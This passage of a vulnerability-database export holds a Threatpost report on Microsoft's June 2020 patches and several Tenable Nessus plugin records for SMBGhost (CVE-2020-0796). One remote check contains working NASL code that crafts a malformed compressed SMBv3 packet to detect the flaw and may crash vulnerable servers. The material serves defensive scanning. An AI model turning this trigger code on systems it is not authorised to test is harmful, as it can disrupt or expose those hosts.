in March, dubbed \u201cSMBGhost.\u201d CISA recently warned that the release of a fully [functional proof-of-concept](<https://threatpost.com/wormable-unpatched-microsoft-bug/153632/>) (PoC) for SMBGhost could soon spark a wave of cyberattacks.\n\nThe third vulnerability patched in Microsoft SMB, [CVE-2020-1301](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1301>), is a remote code-execution vulnerability that exists in the way SMBv1 handles requests. To exploit the flaw, an attacker would need to be authenticated and to send a specially crafted packet to a targeted SMBv1 server.\n\nNarang said this flaw \u201cmight create a sense of d\u00e9j\u00e0 vu\u201d for another remote code-execution vulnerability in SMBv1, [EternalBlue](<https://threatpost.com/nsas-eternalblue-exploit-ported-to-windows-10/126087/>), which was used in the [WannaCry 2017 ransomware attacks.](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>)\n\n\u201cHowever, the difference between these two is that EternalBlue could be exploited by an unauthenticated attacker, whereas this flaw requires authentication, according to Microsoft,\u201d he said. \u201cThis vulnerability affects Windows 7 and Windows 2008, both of which reached their end of support in January 2020. However, Microsoft has provided patches for both operating systems.\u201d\n\n## **VBScript**\n\nVarious critical remote code-execution flaws were discovered in VBScript, Microsoft\u2019s Active Scripting language that is modeled on Visual Basic ([CVE-2020-1214](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1214>),[ CVE-2020-1215](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1215>), [CVE-2020-1216](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1216>), [CVE-2020-1230](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1230>), [CVE-2020-1260](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1260>)). The flaws exist in the way that the VBScript engine handles objects in memory; an attacker could corrupt memory in such a way that allows them to execute arbitrary code in the context of the current user.\n\nIn a real-life attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website.\n\n\u201cAn attacker who successfully exploited the vulnerability could gain the same user rights as the current user,\u201d said Microsoft. \u201cIf the current user is logged on with administrative-user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change or delete data; or create new accounts with full user rights.\u201d\n\n## **Other Critical Flaws**\n\nAlso of note is a critical flaw (CVE-2020-1299) that exists in [Microsoft Windows,](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1299>) which could allow remote code-execution if a .LNK file is processed. An .LNK file is a shortcut or \u201clink.\u201d An attacker can embed a malicious .LNK in a removable drive or remote share, and then convince the victim to open the drive or share in Windows Explorer. Then, the malicious binary will execute the code. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user, according to Microsoft.\n\nThe update also addressed a Windows [critical RCE flaw](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1300>) (CVE-2020-1300) that exists when Microsoft Windows fails to properly handle cabinet files. To exploit the vulnerability, an attacker would have to convince a user to either open a specially crafted cabinet file or spoof a network printer and trick a user into installing a malicious cabinet file disguised as a printer driver, according to Microsoft\u2019s update.\n\nAnother critical vulnerability (CVE-2020-1286) exists due to Windows Shell not properly validating file paths. An attacker could exploit the flaw by convincing a user to open a specially crafted file, and then would be able to run arbitrary code in the context of the user, [according to Microsoft\u2019s update](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1286>).\n\n\u201cIf the current user is logged on as an administrator, an attacker could take control of the affected system,\u201d said Microsoft. \u201cAn attacker could then install programs; view, change or delete data; or create new accounts with elevated privileges. Users whose accounts are configured to have fewer privileges on the system could be less impacted than users who operate with administrative privileges.\u201d\n\nA critical flaw ([CVE-2020-1181](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1181>)) in [SharePoint server](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1181>) was also fixed, stemming from the server failing to properly identify and filter unsafe ASP.Net web controls. The flaw can be abused by an authenticated, remote user who invokes a specially crafted page on an affected version of Microsoft SharePoint Server, allowing them to execute code.\n\nMicrosoft also issued [updates addressing Windows 10, 8.1 and Windows Server versions](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200010>) affected by a critical, use-after-free [Adobe Flash Player](<https://threatpost.com/adobe-warns-critical-flaws-flash-player-framemaker/156417/>) flaw ([CVE-2020-9633](<https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-9633>)). According to Microsoft, \u201cIn a web-based attack scenario where the user is using Internet Explorer for the desktop, an attacker could host a specially crafted website that is designed to exploit any of these vulnerabilities through Internet Explorer and then convince a user to view the website.\u201d\n\nMeanwhile, Adobe earlier on Tuesday [released patches](<https://threatpost.com/adobe-warns-critical-flaws-flash-player-framemaker/156417/>) for four critical flaws in Flash Player and in its Framemaker document processor as part of its regularly scheduled updates. The bugs, if exploited, could enable arbitrary code-execution.\n", "cvss3": {}, "published": "2020-06-09T19:28:54", "type": "threatpost", "title": "Microsoft June Patch Tuesday Fixes 129 Flaws in Largest-Ever Update", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0796", "CVE-2020-1181", "CVE-2020-1206", "CVE-2020-1214", "CVE-2020-1215", "CVE-2020-1216", "CVE-2020-1230", "CVE-2020-1260", "CVE-2020-1284", "CVE-2020-1286", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-9633"], "modified": "2020-06-09T19:28:54", "id": "THREATPOST:B2D0023D9A73CEE9C328A0927149D5B2", "href": "https://threatpost.com/microsoft-june-patch-tuesday-largest-ever-update/156430/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-01-11T15:07:52", "description": "A remote code execution vulnerability exists in Microsoft Server Message Block 3.1.1 (SMBv3) protocol due to how it handles a maliciously crafted compressed data packet. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands.\n\nNote, the plugin checks if SMB 3.1.1 with compression is enabled. It does not currently verify the vulnerability itself.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-11T00:00:00", "type": "nessus", "title": "Microsoft Windows SMBv3 Compression RCE (ADV200005)(CVE-2020-0796)(Remote)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-12-06T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_MICROSOFT_WINDOWS_ADV200005_REMOTE.NASL", "href": "https://www.tenable.com/plugins/nessus/134421", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134421);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2020-0796\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0028\");\n\n script_name(english:\"Microsoft Windows SMBv3 Compression RCE (ADV200005)(CVE-2020-0796)(Remote)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is using a vulnerable version of SMB.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote code execution vulnerability exists in Microsoft Server Message Block\n3.1.1 (SMBv3) protocol due to how it handles a maliciously crafted compressed\ndata packet. An unauthenticated, remote attacker can exploit this to bypass\nauthentication and execute arbitrary commands.\n\nNote, the plugin checks if SMB 3.1.1 with compression is enabled. It does not\ncurrently verify the vulnerability itself.\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200005\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?736703d3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has provided additional details and guidance in the ADV200005 advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0796\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SMBv3 Compression Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/11\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_dialects_enabled.nasl\");\n script_require_keys(\"SMB/smb_dialect/3.1.1\", \"Settings/ParanoidReport\");\n script_require_ports(139, 445);\n\n exit(0);\n}\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = kb_smb_transport();\n\nif (get_kb_item('SMB/smb_dialect/3.1.1/compression'))\n{\n report = 'Nessus was able to detect SMB 3.1.1 with compression enabled using a specially crafted packet.\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n}\nelse\n{\n audit(AUDIT_HOST_NOT, 'affected');\n}\n\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:11:06", "description": "A remote code execution vulnerability exists in Microsoft Server Message Block 3.1.1 (SMBv3) protocol due to how it handles a maliciously crafted compressed data packet. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands.\n\nNote that this plugin works only if it can to connect to the IPC$ share anonymously using SMB dialect 3.1.1.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-04-02T00:00:00", "type": "nessus", "title": "Microsoft Windows SMBv3 Compression RCE (ADV200005)(CVE-2020-0796)(Remote)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "MICROSOFT_SMB_CVE-2020-0796.NASL", "href": "https://www.tenable.com/plugins/nessus/135177", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135177);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-0796\");\n script_xref(name:\"MSKB\", value:\"4551762\");\n script_xref(name:\"MSFT\", value:\"MS20-4551762\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0028\");\n\n script_name(english:\"Microsoft Windows SMBv3 Compression RCE (ADV200005)(CVE-2020-0796)(Remote)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is using a vulnerable version of SMB.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote code execution vulnerability exists in Microsoft Server Message Block\n3.1.1 (SMBv3) protocol due to how it handles a maliciously crafted compressed\ndata packet. An unauthenticated, remote attacker can exploit this to bypass\nauthentication and execute arbitrary commands.\n\nNote that this plugin works only if it can to connect to the IPC$\nshare anonymously using SMB dialect 3.1.1.\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?32926bb8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4551762.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0796\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SMBv3 Compression Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_dialects_enabled.nasl\", \"os_fingerprint.nasl\", \"samba_detect.nasl\");\n script_require_keys(\"SMB/smb_dialect/3.1.1/compression\");\n script_exclude_keys(\"SMB/samba\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('agent.inc');\n\n##\n# Receive an SMB message starting with the header.\n#\n# @return SMB response message or NULL on error.\n##\nfunction my_smb2_recv()\n{\n local_var socket, timeout, length, trailer, ret, header;\n\n socket = session_get_socket ();\n timeout = session_get_timeout ();\n\n length = recv(socket:socket, length:4, min:4, timeout:timeout);\n if (strlen(length) != 4)\n return NULL;\n\n length = 65535 * ord(length[1]) +\n 256 * ord(length[2]) +\n ord(length[3]);\n\n if (length > 100000)\n length = 100000;\n\n trailer = recv(socket:socket, length:length, min:length, timeout:timeout);\n if (strlen(trailer) < length )\n return NULL;\n\n return trailer;\n}\n\n\n#\n# MAIN\n#\n\n# Exit if run on agent.\nif(agent()) exit(0,'This plugin is disabled on Nessus Agents.');\n\n# Exit if samba is detected.\nif (get_kb_item('SMB/samba') ) exit(0, 'SMB server is Samba.');\n\n# If OS is detected, exit if the OS is not Windows.\nos = get_kb_item('Host/OS');\nif (os && os !~ '[Ww]indows')\n audit(AUDIT_OS_NOT, 'Windows');\n\n# Exit if SMB v3.1.1 is not supported\nif(! get_kb_item('SMB/smb_dialect/3.1.1'))\n exit(0, 'SMB dialect 3.1.1 is not supported on the remote host.');\n\n# Exit if compression is not supported or enabled.\nif(! get_kb_item('SMB/smb_dialect/3.1.1/compression'))\n exit(0, 'SMB compression is not supported or enabled on the remote host.'); \n\n# Exit if LZNT1 compression is not supported or enabled.\nif(! get_kb_item('SMB/smb_dialect/3.1.1/compression/LZNT1'))\n exit(0, 'SMB compression algorithm LZNT1 is not supported or enabled on the remote host.');\n\nport = kb_smb_transport();\n\n# SMB transport port isn't open\nif (!get_port_state(port))\n audit(AUDIT_PORT_CLOSED, port);\n\nif (!smb_session_init(timeout:10)) audit(AUDIT_FN_FAIL, 'smb_session_init');\nsoc = session_get_socket();\n\nret = NetUseAdd(share:'IPC$');\nif(ret != 1)\n exit(0, 'Failed to connect to IPC$ anonymously using SMB v3.1.1.');\n\nLZNT1 = 1;\n# 0x800135 'A's compressed with LZNT1\norig_size = 0x800135;\n\ncompressed = NULL;\n# 0x800000 'A's\nfor (i = 0; i < 0x800; i++)\n compressed += '\\x03\\xb0\\x02\\x41\\xfc\\x0f'; # 0x1000 'A's\n\n# 0x135 'A's\ncompressed += '\\x03\\xb0\\x02\\x41\\x31\\x01';\n\n# Use TREE_CONNECT as the first message in a compound request to\n# avoid crash in srv2.sys versions prior to 10.0.18362.329.\npath = 'IPC$';\ncpath = cstring (string:\"\\\\\", _null:1) + cstring (string:session_get_hostname(), _null:1) + cstring (string:\"\\\", _null:1) + cstring (string:path, _null:1);\n\ndata = raw_word(w:9) + # StructureSize\n raw_word(w:0) + # Reserved\n raw_word(w:0x48) + # PathOffset\n raw_word(w:strlen(cpath)) + # PathLength\n cpath; # Buffer\n\n# Messages in a compound request are 8-byte aligned. \nif(strlen(data) % 8)\n data += crap(data:'\\x00', length: 8 - strlen(data)%8);\n\nmsg1 = smb2_header(command:3, status:STATUS_SUCCESS);\nmsg1 += null_signature;\nmsg1[20] = raw_string(0x40 + strlen(data));\nmsg1 += data;\n\n# The second message in the compound request is compressed such that\n#\n# (COMPRESSION_TRANSFORM_HEADER.offset +\n# COMPRESSION_TRANSFORM_HEADER.OriginalCompressedSegmentSize) > 0x800134\n#\n# Use QUERY_DIRECTORY so that the message is not subject to the 0x11000-byte\n# max msg_size limit.\ncommand = 0xE;\nheader = smb2_header(command:command, status:STATUS_SUCCESS);\nheader += null_signature;\n\nuncompressed = msg1 + header;\ncth = raw_dword(d:0x424D53FC)\n + raw_dword(d:orig_size) # OriginalCompressedSegmentSize\n + raw_word(w:LZNT1) # CompressionAlgorithm\n + raw_word(w:0) # flags\n + raw_dword(d:strlen(uncompressed)); # offset\n\npacket = cth + uncompressed + compressed;\n\nlength = strlen(packet);\nnetbios = netbios_header (type:0, length:length) + packet;\nsend (socket:soc, data:netbios);\nres = my_smb2_recv();\nNetUseDel();\n\n# The vulnerable server does not check\n# offset + OriginalCompressedSegmentSize <= 0x800134, the compound request\n# is processed and a compressed response is returned.\nif((strlen(res) > 16 && get_dword(blob:res, pos:0) == 0x424D53FC)\n # Should not happen; but in case TREE_CONNECT in the compound request\n # fails, crash on vulnerable srv2.sys version < 10.0.18362.329\n || !smb_session_init(timeout:10))\n{\n extra = 'Nessus was able to detect the vulnerability by sending a specially crafted message to the remote SMB server.';\n security_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n extra : extra\n );\n}\n# The patched server checks\n# offset + OriginalCompressedSegmentSize <= 0x800134, and the check fails.\n# The server closes the connection without returning a response.\nelse\n audit(AUDIT_HOST_NOT, 'affected');\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:07:38", "description": "This plugin has been deprecated due to an out-of-band patch being release by the vendor. The suggested mitigation provided in ADV200005 is no longer required. Plugin 134428 should be used instead to verify the patch is properly applied.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-11T00:00:00", "type": "nessus", "title": "Microsoft Windows SMBv3 Compression RCE (ADV200005)(CVE-2020-0796)(Deprecated)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_MICROSOFT_WINDOWS_ADV200005.NASL", "href": "https://www.tenable.com/plugins/nessus/134420", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2020/03/12. Deprecated by smb_nt_ms20_mar_4551762.nasl.\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134420);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/12\");\n\n script_cve_id(\"CVE-2020-0796\");\n\n script_name(english:\"Microsoft Windows SMBv3 Compression RCE (ADV200005)(CVE-2020-0796)(Deprecated)\");\n script_summary(english:\"Checks the Windows version and mitigative measures.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"This plugin has been deprecated due to an out-of-band patch being release by\nthe vendor. The suggested mitigation provided in ADV200005 is no longer\nrequired. Plugin 134428 should be used instead to verify the patch is properly\napplied.\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200005\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?736703d3\");\n script_set_attribute(attribute:\"solution\", value:\n\"n/a\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0796\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/11\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\", \"SMB/WindowsVersionBuild\");\n\n script_require_ports(139, 445);\n\n exit(0);\n}\n\nexit(0,'This plugin has been deprecated. Use smb_nt_ms20_mar_4551762.nasl (plugin ID 134428) instead.');\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:09:04", "description": "The remote Windows host is missing security update 4551762. It is, therefore, affected by a remote code execution vulnerability. The vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server or client.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-12T00:00:00", "type": "nessus", "title": "KB4551762: Windows 10 Version 1903 and Windows 10 Version 1909 OOB Security Update (ADV200005)(CVE-2020-0796)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-12-06T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_MAR_4551762.NASL", "href": "https://www.tenable.com/plugins/nessus/134428", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134428);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2020-0796\");\n script_xref(name:\"MSKB\", value:\"4551762\");\n script_xref(name:\"MSFT\", value:\"MS20-4551762\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0028\");\n\n script_name(english:\"KB4551762: Windows 10 Version 1903 and Windows 10 Version 1909 OOB Security Update (ADV200005)(CVE-2020-0796)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4551762. It is, therefore, affected by a remote code execution\nvulnerability. The vulnerability exists in the way that the Microsoft Server Message Block 3.1.1\n(SMBv3) protocol handles certain requests. An attacker who successfully exploited the vulnerability could gain the\nability to execute code on the target server or client.\");\n # https://support.microsoft.com/en-us/help/4551762/windows-10-update-kb4551762\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ab6efe1b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4551762.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0796\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SMBv3 Compression Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n 